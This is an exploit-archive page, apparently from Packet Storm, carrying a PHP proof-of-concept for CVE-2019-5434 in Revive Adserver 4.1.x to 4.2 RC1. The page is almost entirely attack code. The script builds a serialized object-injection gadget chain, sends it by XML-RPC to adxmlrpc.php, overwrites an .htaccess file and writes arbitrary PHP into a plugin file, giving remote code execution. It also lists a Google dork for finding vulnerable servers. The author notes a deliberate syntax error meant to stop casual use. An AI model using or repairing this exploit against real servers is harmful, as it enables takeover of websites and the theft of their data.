what you don't know can hurt you

Revive Adserver 4.2 Remote Code Execution

Revive Adserver 4.2 Remote Code Execution
Posted Dec 4, 2019
Authored by crlf

Revive Adserver version 4.2 suffers from a code execution vulnerability.

tags | exploit, code execution
advisories | CVE-2019-5434
MD5 | 798dbf2fc1184deffa0d4ee3b26e6156

Revive Adserver 4.2 Remote Code Execution

Change Mirror Download
# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x <= 4.2 RC1
# Tested on: *nix
# CVE : CVE-2019-5434
# Сontains syntax error for protection against skids


<?php
# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
# coded by @crlf, with love for antichat.com
# special thanks to @Kaimi :)
# the script should be used only for educational purposes!

namespace{
(!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x, $url, $code) = $argv);

$source = 'data:text/html;base64,'.base64_encode('#');
$destination = 'plugins/.htaccess';
#$destination = 'var/.htaccess';

if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));

$source = 'data:text/html;base64,'.base64_encode($code);
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
#$destination = 'var/default.conf.php';

request($url, $source, $destination);
message('check '.$url.$destination);

function request($url, $source, $destination){

$what = serialize(
['what' =>
new Pdp\Uri\Url(
new League\Flysystem\File( $destination,
new League\Flysystem\File( 'x://'.$source,
new League\Flysystem\MountManager(
new League\Flysystem\Filesystem(
new League\Flysystem\Config,
new League\Flysystem\Adapter\Local('')
),
new League\Flysystem\Plugin\ForcedCopy
)
)
)
)
]
);

$what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));

$xml = '<?xml version="1.0" encoding="ISO-8859-1"?>
<methodCall>
<methodName>openads.spc</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>remote_addr</name>
<value>8.8.8.8</value>
</member>
<member>
<name>cookies</name>
<value>
<array>
</array>
</value>
</member>
</struct>
</value>
</param>
<param><value><string>'.$what.'</string></value></param>
<param><value><string>0</string></value></param>
<param><value><string>dsad</string></value></param>
<param><value><boolean>1</boolean></value></param>
<param><value><boolean>0</boolean></value></param>
<param><value><boolean>1</boolean></value></param>
</params>
</methodCall>';

return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
['http' =>
['method' => 'POST',
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
'header' =>'Content-type: application/x-www-form-urlencoded',
'content'=> $xml
]
])
);
}

function message($str){
print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
}
}

namespace League\Flysystem\Plugin{
class ForcedCopy{}
}

namespace League\Flysystem{
class Config{
protected $settings = [];
public function __construct(){
$this->settings = ['disable_asserts' => true];
}
}
class Filesystem{
protected $adapter;
protected $config;
public function __construct($config,$adapter){
$this->config = $config;
$this->adapter = $adapter;
}
}
class MountManager{
protected $filesystems = [];
protected $plugins = [];
public function __construct($filesystem, $handler){
$this->filesystems = ['x' => $filesystem];
$this->plugins = ['__toString' => $handler];
}
}
class File{
protected $path;
protected $filesystem;
public function __construct($path, $obj){
$this->filesystem = $obj;
$this->path = $path;
}
}
}

namespace League\Flysystem\Adapter{
class Local{
protected $pathPrefix;
public function __construct($prefix){
$this->pathPrefix = $prefix;
}
}
}

namespace Pdp\Uri{
class Url{
private $host;
public function __construct($file){
$this->host = $file;
}
}
}
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close